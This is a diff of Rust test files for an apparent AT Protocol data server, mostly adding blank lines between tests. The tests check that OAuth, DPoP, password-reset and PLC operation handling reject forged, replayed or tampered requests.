}
775
+
760
776
#[tokio::test]
761
777
async fn test_oauth_cannot_modify_other_users_repo() {
762
778
let url = base_url().await;
···
804
820
let posts = posts_body["records"].as_array().unwrap();
805
821
assert_eq!(posts.len(), 0, "Alice's repo should have no posts from Bob");
806
822
}
823
+
807
824
#[tokio::test]
808
825
async fn test_oauth_session_isolation_between_users() {
809
826
let url = base_url().await;
···
878
895
assert_eq!(bob_posts.len(), 1);
879
896
assert_eq!(bob_posts[0]["value"]["text"], "Bob's different thoughts");
880
897
}
898
+
881
899
#[tokio::test]
882
900
async fn test_oauth_token_works_with_sync_endpoints() {
883
901
let url = base_url().await;
+56 tests/oauth_security.rs
···
12
12
use sha2::{Digest, Sha256};
13
13
use wiremock::{Mock, MockServer, ResponseTemplate};
14
14
use wiremock::matchers::{method, path};
15
+
15
16
fn no_redirect_client() -> reqwest::Client {
16
17
reqwest::Client::builder()
17
18
.redirect(redirect::Policy::none())
18
19
.build()
19
20
.unwrap()
20
21
}
22
+
21
23
fn generate_pkce() -> (String, String) {
22
24
let verifier_bytes: [u8; 32] = rand::random();
23
25
let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes);
···
27
29
let code_challenge = URL_SAFE_NO_PAD.encode(&hash);
28
30
(code_verifier, code_challenge)
29
31
}
32
+
30
33
async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer {
31
34
let mock_server = MockServer::start().await;
32
35
let client_id = mock_server.uri();
···
46
49
.await;
47
50
mock_server
48
51
}
52
+
49
53
async fn get_oauth_tokens(
50
54
http_client: &reqwest::Client,
51
55
url: &str,
···
117
121
let refresh_token = token_body["refresh_token"].as_str().unwrap().to_string();
118
122
(access_token, refresh_token, client_id)
119
123
}
124
+
120
125
#[tokio::test]
121
126
async fn test_security_forged_token_signature_rejected() {
122
127
let url = base_url().await;
···
134
139
.unwrap();
135
140
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Forged signature should be rejected");
136
141
}
142
+
137
143
#[tokio::test]
138
144
async fn test_security_modified_payload_rejected() {
139
145
let url = base_url().await;
···
153
159
.unwrap();
154
160
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Modified payload should be rejected");
155
161
}
162
+
156
163
#[tokio::test]
157
164
async fn test_security_algorithm_none_attack_rejected() {
158
165
let url = base_url().await;
···
181
188
.unwrap();
182
189
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Algorithm 'none' attack should be rejected");
183
190
}
191
+
184
192
#[tokio::test]
185
193
async fn test_security_algorithm_substitution_attack_rejected() {
186
194
let url = base_url().await;
···
209
217
.unwrap();
210
218
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Algorithm substitution attack should be rejected");
211
219
}
220
+
212
221
#[tokio::test]
213
222
async fn test_security_expired_token_rejected() {
214
223
let url = base_url().await;
···
237
246
.unwrap();
238
247
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Expired token should be rejected");
239
248
}
249
+
240
250
#[tokio::test]
241
251
async fn test_security_pkce_plain_method_rejected() {
242
252
let url = base_url().await;
···
264
274
"Error should mention S256 requirement"
265
275
);
266
276
}
277
+
267
278
#[tokio::test]
268
279
async fn test_security_pkce_missing_challenge_rejected() {
269
280
let url = base_url().await;
···
283
294
.unwrap();
284
295
assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Missing PKCE challenge should be rejected");
285
296
}
297
+
286
298
#[tokio::test]
287
299
async fn test_security_pkce_wrong_verifier_rejected() {
288
300
let url = base_url().await;
···
352
364
let body: Value = token_res.json().await.unwrap();
353
365
assert_eq!(body["error"], "invalid_grant");
354
366
}
367
+
355
368
#[tokio::test]
356
369
async fn test_security_authorization_code_replay_attack() {
357
370
let url = base_url().await;
···
434
447
let body: Value = replay_res.json().await.unwrap();
435
448
assert_eq!(body["error"], "invalid_grant");
436
449
}
450
+
437
451
#[tokio::test]
438
452
async fn test_security_refresh_token_replay_attack() {
439
453
let url = base_url().await;
···
550
564
"Token family should be revoked after replay detection"
551
565
);
552
566
}
567
+
553
568
#[tokio::test]
554
569
async fn test_security_redirect_uri_manipulation() {
555
570
let url = base_url().await;
···
573
588
.unwrap();
574
589
assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Unregistered redirect_uri should be rejected");
575
590
}
591
+
576
592
#[tokio::test]
577
593
async fn test_security_deactivated_account_blocked() {
578
594
let url = base_url().await;
···
639
655
let body: Value = auth_res.json().await.unwrap();
640
656
assert_eq!(body["error"], "access_denied");
641
657
}
658
+
642
659
#[tokio::test]
643
660
async fn test_security_url_injection_in_state_parameter() {
644
661
let url = base_url().await;
···
710
727
location
711
728
);
712
729
}
730
+
713
731
#[tokio::test]
714
732
async fn test_security_cross_client_token_theft() {
715
733
let url = base_url().await;
···
789
807
"Error should mention client_id mismatch"
790
808
);
791
809
}
810
+
792
811
#[test]
793
812
fn test_security_dpop_nonce_tamper_detection() {
794
813
let secret = b"test-dpop-secret-32-bytes-long!!";
···
803
822
let result = verifier.validate_nonce(&tampered_nonce);
804
823
assert!(result.is_err(), "Tampered nonce should be rejected");
805
824
}
825
+
806
826
#[test]
807
827
fn test_security_dpop_nonce_cross_server_rejected() {
808
828
let secret1 = b"server-1-secret-32-bytes-long!!!";
···
813
833
let result = verifier2.validate_nonce(&nonce_from_server1);
814
834
assert!(result.is_err(), "Nonce from different server should be rejected");
815
835
}
836
+
816
837
#[test]
817
838
fn test_security_dpop_proof_signature_tampering() {
818
839
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
···
851
872
let result = verifier.verify_proof(&tampered_proof, "POST", "https://example.com/token", None);
852
873
assert!(result.is_err(), "Tampered DPoP signature should be rejected");
853
874
}
875
+
854
876
#[test]
855
877
fn test_security_dpop_proof_key_substitution() {
856
878
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
···
888
910
let result = verifier.verify_proof(&mismatched_proof, "POST", "https://example.com/token", None);
889
911
assert!(result.is_err(), "DPoP proof with mismatched key should be rejected");
890
912
}
913
+
891
914
#[test]
892
915
fn test_security_jwk_thumbprint_consistency() {
893
916
let jwk = DPoPJwk {
···
905
928
assert_eq!(first, result, "Thumbprint should be deterministic, but iteration {} differs", i);
906
929
}
907
930
}
931
+
908
932
#[test]
909
933
fn test_security_dpop_iat_clock_skew_limits() {
910
934
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
···
956
980
}
957
981
}
958
982
}
983
+
959
984
#[test]
960
985
fn test_security_dpop_method_case_insensitivity() {
961
986
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
···
992
1017
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None);
993
1018
assert!(result.is_ok(), "HTTP method comparison should be case-insensitive");
994
1019
}
1020
+
995
1021
#[tokio::test]
996
1022
async fn test_security_invalid_grant_type_rejected() {
997
1023
let url = base_url().await;
···
1024
1050
);
1025
1051
}
1026
1052
}
1053
+
1027
1054
#[tokio::test]
1028
1055
async fn test_security_token_with_wrong_typ_rejected() {
1029
1056
let url = base_url().await;
···
1066
1093
);
1067
1094
}
1068
1095
}
1096
+
1069
1097
#[tokio::test]
1070
1098
async fn test_security_missing_required_claims_rejected() {
1071
1099
let url = base_url().await;
···
1098
1126
);
1099
1127
}
1100
1128
}
1129
+
1101
1130
#[tokio::test]
1102
1131
async fn test_security_malformed_tokens_rejected() {
1103
1132
let url = base_url().await;
···
1130
1159
);
1131
1160
}
1132
1161
}
1162
+
1133
1163
#[tokio::test]
1134
1164
async fn test_security_authorization_header_formats() {
1135
1165
let url = base_url().await;
···
1175
1205
);
1176
1206
}
1177
1207
}
1208
+
1178
1209
#[tokio::test]
1179
1210
async fn test_security_no_authorization_header() {
1180
1211
let url = base_url().await;
···
1186
1217
.unwrap();
1187
1218
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Missing auth header should return 401");
1188
1219
}
1220
+
1189
1221
#[tokio::test]
1190
1222
async fn test_security_empty_authorization_header() {
1191
1223
let url = base_url().await;
···
1198
1230
.unwrap();
1199
1231
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Empty auth header should return 401");
1200
1232
}
1233
+
1201
1234
#[tokio::test]
1202
1235
async fn test_security_revoked_token_rejected() {
1203
1236
let url = base_url().await;
···
1219
1252
let introspect_body: Value = introspect_res.json().await.unwrap();
1220
1253
assert_eq!(introspect_body["active"], false, "Revoked token should be inactive");
1221
1254
}
1255
+
1222
1256
#[tokio::test]
1223
1257
#[ignore = "rate limiting is disabled in test environment"]
1224
1258
async fn test_security_oauth_authorize_rate_limiting() {
···
1274
1308
rate_limited_count
1275
1309
);
1276
1310
}
1311
+
1277
1312
fn create_dpop_proof(
1278
1313
method: &str,
1279
1314
uri: &str,
···
1317
1352
let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes());
1318
1353
format!("{}.{}", signing_input, signature_b64)
1319
1354
}
1355
+
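The `create_dpop_proof` test helper above is mostly collapsed in this view. As a rough sketch only (hypothetical `dpop_proof_sketch` name; assumes `p256` 0.13, `base64` 0.21+, `serde_json`, `chrono`, and `rand`), a DPoP proof is a compact ES256 JWT whose header is typed `dpop+jwt` and embeds the public JWK, and whose payload binds the HTTP method (`htm`) and target URI (`htu`):

```rust
use base64::engine::general_purpose::URL_SAFE_NO_PAD;
use base64::Engine as _;
use p256::ecdsa::{signature::Signer, Signature, SigningKey};
use serde_json::json;

// Sketch of building a DPoP proof JWT over an HTTP method and URI.
fn dpop_proof_sketch(key: &SigningKey, method: &str, uri: &str) -> String {
    // Header carries the public key as a JWK so the server can bind the token to it.
    let point = key.verifying_key().to_encoded_point(false);
    let header = json!({
        "typ": "dpop+jwt",
        "alg": "ES256",
        "jwk": {
            "kty": "EC",
            "crv": "P-256",
            "x": URL_SAFE_NO_PAD.encode(point.x().unwrap()),
            "y": URL_SAFE_NO_PAD.encode(point.y().unwrap()),
        }
    });
    // Payload binds the proof to one request: unique jti, method, URI, issue time.
    let payload = json!({
        "jti": format!("{:x}", rand::random::<u128>()),
        "htm": method,
        "htu": uri,
        "iat": chrono::Utc::now().timestamp(),
    });
    let signing_input = format!(
        "{}.{}",
        URL_SAFE_NO_PAD.encode(header.to_string()),
        URL_SAFE_NO_PAD.encode(payload.to_string())
    );
    let signature: Signature = key.sign(signing_input.as_bytes());
    format!("{}.{}", signing_input, URL_SAFE_NO_PAD.encode(signature.to_bytes()))
}
```

The `verify_proof` tests that follow exercise exactly these bindings: a wrong `htm`, a wrong `htu`, a stale or future `iat`, and a missing or mismatched `ath` all have to fail.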
1320
1356
#[test]
1321
1357
fn test_dpop_nonce_generation() {
1322
1358
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1326
1362
assert!(!nonce1.is_empty());
1327
1363
assert!(!nonce2.is_empty());
1328
1364
}
1365
+
1329
1366
#[test]
1330
1367
fn test_dpop_nonce_validation_success() {
1331
1368
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1334
1371
let result = verifier.validate_nonce(&nonce);
1335
1372
assert!(result.is_ok(), "Valid nonce should pass: {:?}", result);
1336
1373
}
1374
+
1337
1375
#[test]
1338
1376
fn test_dpop_nonce_wrong_secret() {
1339
1377
let secret1 = b"test-dpop-secret-32-bytes-long!!";
···
1344
1382
let result = verifier2.validate_nonce(&nonce);
1345
1383
assert!(result.is_err(), "Nonce from different secret should fail");
1346
1384
}
1385
+
1347
1386
#[test]
1348
1387
fn test_dpop_nonce_invalid_format() {
1349
1388
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1352
1391
assert!(verifier.validate_nonce("").is_err());
1353
1392
assert!(verifier.validate_nonce("!!!not-base64!!!").is_err());
1354
1393
}
1394
+
1355
1395
#[test]
1356
1396
fn test_jwk_thumbprint_ec_p256() {
1357
1397
let jwk = DPoPJwk {
···
1366
1406
assert!(!tp.is_empty());
1367
1407
assert!(tp.chars().all(|c| c.is_alphanumeric() || c == '-' || c == '_'));
1368
1408
}
1409
+
1369
1410
#[test]
1370
1411
fn test_jwk_thumbprint_ec_secp256k1() {
1371
1412
let jwk = DPoPJwk {
···
1377
1418
let thumbprint = compute_jwk_thumbprint(&jwk);
1378
1419
assert!(thumbprint.is_ok());
1379
1420
}
1421
+
1380
1422
#[test]
1381
1423
fn test_jwk_thumbprint_okp_ed25519() {
1382
1424
let jwk = DPoPJwk {
···
1388
1430
let thumbprint = compute_jwk_thumbprint(&jwk);
1389
1431
assert!(thumbprint.is_ok());
1390
1432
}
1433
+
1391
1434
#[test]
1392
1435
fn test_jwk_thumbprint_missing_crv() {
1393
1436
let jwk = DPoPJwk {
···
1399
1442
let thumbprint = compute_jwk_thumbprint(&jwk);
1400
1443
assert!(thumbprint.is_err());
1401
1444
}
1445
+
1402
1446
#[test]
1403
1447
fn test_jwk_thumbprint_missing_x() {
1404
1448
let jwk = DPoPJwk {
···
1410
1454
let thumbprint = compute_jwk_thumbprint(&jwk);
1411
1455
assert!(thumbprint.is_err());
1412
1456
}
1457
+
1413
1458
#[test]
1414
1459
fn test_jwk_thumbprint_missing_y_for_ec() {
1415
1460
let jwk = DPoPJwk {
···
1421
1466
let thumbprint = compute_jwk_thumbprint(&jwk);
1422
1467
assert!(thumbprint.is_err());
1423
1468
}
1469
+
1424
1470
#[test]
1425
1471
fn test_jwk_thumbprint_unsupported_key_type() {
1426
1472
let jwk = DPoPJwk {
···
1432
1478
let thumbprint = compute_jwk_thumbprint(&jwk);
1433
1479
assert!(thumbprint.is_err());
1434
1480
}
1481
+
1435
1482
#[test]
1436
1483
fn test_jwk_thumbprint_deterministic() {
1437
1484
let jwk = DPoPJwk {
···
1444
1491
let tp2 = compute_jwk_thumbprint(&jwk).unwrap();
1445
1492
assert_eq!(tp1, tp2, "Thumbprint should be deterministic");
1446
1493
}
1494
+
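These thumbprint tests exercise `compute_jwk_thumbprint`, whose body is not shown in this diff. For an EC key the RFC 7638 recipe is small enough to sketch (hypothetical name; assumes `sha2` and `base64` 0.21+): serialize only the required members in lexicographic order with no whitespace, SHA-256 the result, and base64url-encode it without padding, which is also why the tests can expect a deterministic, URL-safe value.

```rust
use base64::engine::general_purpose::URL_SAFE_NO_PAD;
use base64::Engine as _;
use sha2::{Digest, Sha256};

// RFC 7638 thumbprint sketch for an EC JWK (crv, x, y are already base64url strings).
fn ec_jwk_thumbprint_sketch(crv: &str, x: &str, y: &str) -> String {
    // Required members only, lexicographic order, no whitespace.
    let canonical = format!(r#"{{"crv":"{crv}","kty":"EC","x":"{x}","y":"{y}"}}"#);
    URL_SAFE_NO_PAD.encode(Sha256::digest(canonical.as_bytes()))
}
```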
1447
1495
#[test]
1448
1496
fn test_dpop_proof_invalid_format() {
1449
1497
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1453
1501
let result = verifier.verify_proof("invalid", "POST", "https://example.com", None);
1454
1502
assert!(result.is_err());
1455
1503
}
1504
+
1456
1505
#[test]
1457
1506
fn test_dpop_proof_invalid_typ() {
1458
1507
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1479
1528
let result = verifier.verify_proof(&proof, "POST", "https://example.com", None);
1480
1529
assert!(result.is_err());
1481
1530
}
1531
+
1482
1532
#[test]
1483
1533
fn test_dpop_proof_method_mismatch() {
1484
1534
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1487
1537
let result = verifier.verify_proof(&proof, "GET", "https://example.com/token", None);
1488
1538
assert!(result.is_err());
1489
1539
}
1540
+
1490
1541
#[test]
1491
1542
fn test_dpop_proof_uri_mismatch() {
1492
1543
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1495
1546
let result = verifier.verify_proof(&proof, "POST", "https://other.com/token", None);
1496
1547
assert!(result.is_err());
1497
1548
}
1549
+
1498
1550
#[test]
1499
1551
fn test_dpop_proof_iat_too_old() {
1500
1552
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1503
1555
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None);
1504
1556
assert!(result.is_err());
1505
1557
}
1558
+
1506
1559
#[test]
1507
1560
fn test_dpop_proof_iat_future() {
1508
1561
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1511
1564
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None);
1512
1565
assert!(result.is_err());
1513
1566
}
1567
+
1514
1568
#[test]
1515
1569
fn test_dpop_proof_ath_mismatch() {
1516
1570
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1530
1584
);
1531
1585
assert!(result.is_err());
1532
1586
}
1587
+
1533
1588
#[test]
1534
1589
fn test_dpop_proof_missing_ath_when_required() {
1535
1590
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1543
1598
);
1544
1599
assert!(result.is_err());
1545
1600
}
1601
+
1546
1602
#[test]
1547
1603
fn test_dpop_proof_uri_ignores_query_params() {
1548
1604
let secret = b"test-dpop-secret-32-bytes-long!!";
+9 tests/password_reset.rs
···
4
4
use serde_json::{json, Value};
5
5
use sqlx::PgPool;
6
6
use helpers::verify_new_account;
7
+
7
8
async fn get_pool() -> PgPool {
8
9
let conn_str = common::get_db_connection_string().await;
9
10
sqlx::postgres::PgPoolOptions::new()
···
12
13
.await
13
14
.expect("Failed to connect to test database")
14
15
}
16
+
15
17
#[tokio::test]
16
18
async fn test_request_password_reset_creates_code() {
17
19
let client = common::client();
···
51
53
assert!(code.contains('-'));
52
54
assert_eq!(code.len(), 11);
53
55
}
56
+
54
57
#[tokio::test]
55
58
async fn test_request_password_reset_unknown_email_returns_ok() {
56
59
let client = common::client();
···
63
66
.expect("Failed to request password reset");
64
67
assert_eq!(res.status(), StatusCode::OK);
65
68
}
69
+
66
70
#[tokio::test]
67
71
async fn test_reset_password_with_valid_token() {
68
72
let client = common::client();
···
142
146
.expect("Failed to login attempt");
143
147
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
144
148
}
149
+
145
150
#[tokio::test]
146
151
async fn test_reset_password_with_invalid_token() {
147
152
let client = common::client();
···
159
164
let body: Value = res.json().await.expect("Invalid JSON");
160
165
assert_eq!(body["error"], "InvalidToken");
161
166
}
167
+
162
168
#[tokio::test]
163
169
async fn test_reset_password_with_expired_token() {
164
170
let client = common::client();
···
213
219
let body: Value = res.json().await.expect("Invalid JSON");
214
220
assert_eq!(body["error"], "ExpiredToken");
215
221
}
222
+
216
223
#[tokio::test]
217
224
async fn test_reset_password_invalidates_sessions() {
218
225
let client = common::client();
···
275
282
.expect("Failed to get session");
276
283
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
277
284
}
285
+
278
286
#[tokio::test]
279
287
async fn test_request_password_reset_empty_email() {
280
288
let client = common::client();
···
289
297
let body: Value = res.json().await.expect("Invalid JSON");
290
298
assert_eq!(body["error"], "InvalidRequest");
291
299
}
300
+
292
301
#[tokio::test]
293
302
async fn test_reset_password_creates_notification() {
294
303
let pool = get_pool().await;
+20 tests/plc_migration.rs
···
6
6
use sqlx::PgPool;
7
7
use wiremock::matchers::{method, path};
8
8
use wiremock::{Mock, MockServer, ResponseTemplate};
9
+
9
10
fn encode_uvarint(mut x: u64) -> Vec<u8> {
10
11
let mut out = Vec::new();
11
12
while x >= 0x80 {
···
15
16
out.push(x as u8);
16
17
out
17
18
}
19
+
18
20
fn signing_key_to_did_key(signing_key: &SigningKey) -> String {
19
21
let verifying_key = signing_key.verifying_key();
20
22
let point = verifying_key.to_encoded_point(true);
···
24
26
let encoded = multibase::encode(multibase::Base::Base58Btc, &prefixed);
25
27
format!("did:key:{}", encoded)
26
28
}
29
+
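The two helpers above (`encode_uvarint` and `signing_key_to_did_key`) are partially collapsed. A sketch of the full idea, assuming the `k256` and `multibase` crates used in these tests and the secp256k1 multicodec code 0xe7: the codec is varint-encoded, prepended to the compressed public key, and the result is multibase base58btc-encoded under the `did:key:` prefix.

```rust
use k256::ecdsa::SigningKey;

// Unsigned LEB128 varint, as used for multicodec prefixes.
fn encode_uvarint_sketch(mut x: u64) -> Vec<u8> {
    let mut out = Vec::new();
    while x >= 0x80 {
        out.push((x as u8) | 0x80); // low 7 bits with the continuation bit set
        x >>= 7;
    }
    out.push(x as u8);
    out
}

// did:key for a secp256k1 key: varint(0xe7) ++ compressed point, base58btc multibase.
fn signing_key_to_did_key_sketch(signing_key: &SigningKey) -> String {
    let point = signing_key.verifying_key().to_encoded_point(true);
    let mut prefixed = encode_uvarint_sketch(0xe7);
    prefixed.extend_from_slice(point.as_bytes());
    let encoded = multibase::encode(multibase::Base::Base58Btc, &prefixed);
    format!("did:key:{}", encoded)
}
```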
27
30
fn get_multikey_from_signing_key(signing_key: &SigningKey) -> String {
28
31
let public_key = signing_key.verifying_key();
29
32
let compressed = public_key.to_sec1_bytes();
···
31
34
buf.extend_from_slice(&compressed);
32
35
multibase::encode(multibase::Base::Base58Btc, buf)
33
36
}
37
+
34
38
async fn get_user_signing_key(did: &str) -> Option<Vec<u8>> {
35
39
let db_url = get_db_connection_string().await;
36
40
let pool = PgPool::connect(&db_url).await.ok()?;
···
48
52
.ok()??;
49
53
bspds::config::decrypt_key(&row.key_bytes, row.encryption_version).ok()
50
54
}
55
+
51
56
async fn get_plc_token_from_db(did: &str) -> Option<String> {
52
57
let db_url = get_db_connection_string().await;
53
58
let pool = PgPool::connect(&db_url).await.ok()?;
···
64
69
.await
65
70
.ok()?
66
71
}
72
+
67
73
async fn get_user_handle(did: &str) -> Option<String> {
68
74
let db_url = get_db_connection_string().await;
69
75
let pool = PgPool::connect(&db_url).await.ok()?;
···
75
81
.await
76
82
.ok()?
77
83
}
84
+
78
85
fn create_mock_last_op(
79
86
_did: &str,
80
87
handle: &str,
···
99
106
"sig": "mock_signature_for_testing"
100
107
})
101
108
}
109
+
102
110
fn create_did_document(did: &str, handle: &str, signing_key: &SigningKey, pds_endpoint: &str) -> Value {
103
111
let multikey = get_multikey_from_signing_key(signing_key);
104
112
json!({
···
121
129
}]
122
130
})
123
131
}
132
+
124
133
async fn setup_mock_plc_for_sign(
125
134
did: &str,
126
135
handle: &str,
···
137
146
.await;
138
147
mock_server
139
148
}
149
+
140
150
async fn setup_mock_plc_for_submit(
141
151
did: &str,
142
152
handle: &str,
···
158
168
.await;
159
169
mock_server
160
170
}
171
+
161
172
#[tokio::test]
162
173
#[ignore = "requires mock PLC server setup that is flaky; run manually with --ignored"]
163
174
async fn test_full_plc_operation_flow() {
···
213
224
assert_eq!(operation.get("type").and_then(|v| v.as_str()), Some("plc_operation"));
214
225
assert!(operation.get("prev").is_some(), "Operation should have prev reference");
215
226
}
227
+
216
228
#[tokio::test]
217
229
#[ignore = "requires exclusive env var access; run with: cargo test test_sign_plc_operation_consumes_token -- --ignored --test-threads=1"]
218
230
async fn test_sign_plc_operation_consumes_token() {
···
278
290
"Error should indicate invalid/expired token"
279
291
);
280
292
}
293
+
281
294
#[tokio::test]
282
295
async fn test_sign_plc_operation_with_custom_fields() {
283
296
let client = client();
···
337
350
assert_eq!(also_known_as.unwrap().len(), 2, "Should have 2 aliases");
338
351
assert_eq!(rotation_keys.unwrap().len(), 2, "Should have 2 rotation keys");
339
352
}
353
+
340
354
#[tokio::test]
341
355
#[ignore = "requires mock PLC server setup that is flaky; run manually with --ignored"]
342
356
async fn test_submit_plc_operation_success() {
···
390
404
submit_body
391
405
);
392
406
}
407
+
393
408
#[tokio::test]
394
409
async fn test_submit_plc_operation_wrong_endpoint_rejected() {
395
410
let client = client();
···
441
456
let body: Value = submit_res.json().await.unwrap();
442
457
assert_eq!(body["error"], "InvalidRequest");
443
458
}
459
+
444
460
#[tokio::test]
445
461
async fn test_submit_plc_operation_wrong_signing_key_rejected() {
446
462
let client = client();
···
494
510
let body: Value = submit_res.json().await.unwrap();
495
511
assert_eq!(body["error"], "InvalidRequest");
496
512
}
513
+
497
514
#[tokio::test]
498
515
async fn test_full_sign_and_submit_flow() {
499
516
let client = client();
···
593
610
submit_body
594
611
);
595
612
}
613
+
596
614
#[tokio::test]
597
615
async fn test_cross_pds_migration_with_records() {
598
616
let client = client();
···
692
710
"Record content should match"
693
711
);
694
712
}
713
+
695
714
#[tokio::test]
696
715
async fn test_migration_rejects_wrong_did_document() {
697
716
let client = client();
···
749
768
"Error should mention signature verification failure"
750
769
);
751
770
}
771
+
752
772
#[tokio::test]
753
773
#[ignore = "requires exclusive env var access; run with: cargo test test_full_migration_flow_end_to_end -- --ignored --test-threads=1"]
754
774
async fn test_full_migration_flow_end_to_end() {
+15 tests/plc_operations.rs
···
3
3
use reqwest::StatusCode;
4
4
use serde_json::json;
5
5
use sqlx::PgPool;
6
+
6
7
#[tokio::test]
7
8
async fn test_request_plc_operation_signature_requires_auth() {
8
9
let client = client();
···
16
17
.expect("Request failed");
17
18
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
18
19
}
20
+
19
21
#[tokio::test]
20
22
async fn test_request_plc_operation_signature_success() {
21
23
let client = client();
···
31
33
.expect("Request failed");
32
34
assert_eq!(res.status(), StatusCode::OK);
33
35
}
36
+
34
37
#[tokio::test]
35
38
async fn test_sign_plc_operation_requires_auth() {
36
39
let client = client();
···
45
48
.expect("Request failed");
46
49
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
47
50
}
51
+
48
52
#[tokio::test]
49
53
async fn test_sign_plc_operation_requires_token() {
50
54
let client = client();
···
63
67
let body: serde_json::Value = res.json().await.unwrap();
64
68
assert_eq!(body["error"], "InvalidRequest");
65
69
}
70
+
66
71
#[tokio::test]
67
72
async fn test_sign_plc_operation_invalid_token() {
68
73
let client = client();
···
83
88
let body: serde_json::Value = res.json().await.unwrap();
84
89
assert!(body["error"] == "InvalidToken" || body["error"] == "ExpiredToken");
85
90
}
91
+
86
92
#[tokio::test]
87
93
async fn test_submit_plc_operation_requires_auth() {
88
94
let client = client();
···
99
105
.expect("Request failed");
100
106
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
101
107
}
108
+
102
109
#[tokio::test]
103
110
async fn test_submit_plc_operation_invalid_operation() {
104
111
let client = client();
···
121
128
let body: serde_json::Value = res.json().await.unwrap();
122
129
assert_eq!(body["error"], "InvalidRequest");
123
130
}
131
+
124
132
#[tokio::test]
125
133
async fn test_submit_plc_operation_missing_sig() {
126
134
let client = client();
···
148
156
let body: serde_json::Value = res.json().await.unwrap();
149
157
assert_eq!(body["error"], "InvalidRequest");
150
158
}
159
+
151
160
#[tokio::test]
152
161
async fn test_submit_plc_operation_wrong_service_endpoint() {
153
162
let client = client();
···
179
188
.expect("Request failed");
180
189
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
181
190
}
191
+
182
192
#[tokio::test]
183
193
async fn test_request_plc_operation_creates_token_in_db() {
184
194
let client = client();
···
213
223
assert!(row.token.contains('-'), "Token should contain hyphen");
214
224
assert!(row.expires_at > chrono::Utc::now(), "Token should not be expired");
215
225
}
226
+
216
227
#[tokio::test]
217
228
async fn test_request_plc_operation_replaces_existing_token() {
218
229
let client = client();
···
278
289
.expect("Count query failed");
279
290
assert_eq!(count, 1, "Should only have one token per user");
280
291
}
292
+
281
293
#[tokio::test]
282
294
async fn test_submit_plc_operation_wrong_verification_method() {
283
295
let client = client();
···
321
333
body
322
334
);
323
335
}
336
+
324
337
#[tokio::test]
325
338
async fn test_submit_plc_operation_wrong_handle() {
326
339
let client = client();
···
357
370
let body: serde_json::Value = res.json().await.unwrap();
358
371
assert_eq!(body["error"], "InvalidRequest");
359
372
}
373
+
360
374
#[tokio::test]
361
375
async fn test_submit_plc_operation_wrong_service_type() {
362
376
let client = client();
···
393
407
let body: serde_json::Value = res.json().await.unwrap();
394
408
assert_eq!(body["error"], "InvalidRequest");
395
409
}
410
+
396
411
#[tokio::test]
397
412
async fn test_plc_token_expiry_format() {
398
413
let client = client();
+29 tests/plc_validation.rs
···
7
7
use k256::ecdsa::SigningKey;
8
8
use serde_json::json;
9
9
use std::collections::HashMap;
10
+
10
11
fn create_valid_operation() -> serde_json::Value {
11
12
let key = SigningKey::random(&mut rand::thread_rng());
12
13
let did_key = signing_key_to_did_key(&key);
···
27
28
});
28
29
sign_operation(&op, &key).unwrap()
29
30
}
31
+
30
32
#[test]
31
33
fn test_validate_plc_operation_valid() {
32
34
let op = create_valid_operation();
33
35
let result = validate_plc_operation(&op);
34
36
assert!(result.is_ok());
35
37
}
38
+
36
39
#[test]
37
40
fn test_validate_plc_operation_missing_type() {
38
41
let op = json!({
···
45
48
let result = validate_plc_operation(&op);
46
49
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type")));
47
50
}
51
+
48
52
#[test]
49
53
fn test_validate_plc_operation_invalid_type() {
50
54
let op = json!({
···
54
58
let result = validate_plc_operation(&op);
55
59
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type")));
56
60
}
61
+
57
62
#[test]
58
63
fn test_validate_plc_operation_missing_sig() {
59
64
let op = json!({
···
66
71
let result = validate_plc_operation(&op);
67
72
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig")));
68
73
}
74
+
69
75
#[test]
70
76
fn test_validate_plc_operation_missing_rotation_keys() {
71
77
let op = json!({
···
78
84
let result = validate_plc_operation(&op);
79
85
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys")));
80
86
}
87
+
81
88
#[test]
82
89
fn test_validate_plc_operation_missing_verification_methods() {
83
90
let op = json!({
···
90
97
let result = validate_plc_operation(&op);
91
98
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods")));
92
99
}
100
+
93
101
#[test]
94
102
fn test_validate_plc_operation_missing_also_known_as() {
95
103
let op = json!({
···
102
110
let result = validate_plc_operation(&op);
103
111
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs")));
104
112
}
113
+
105
114
#[test]
106
115
fn test_validate_plc_operation_missing_services() {
107
116
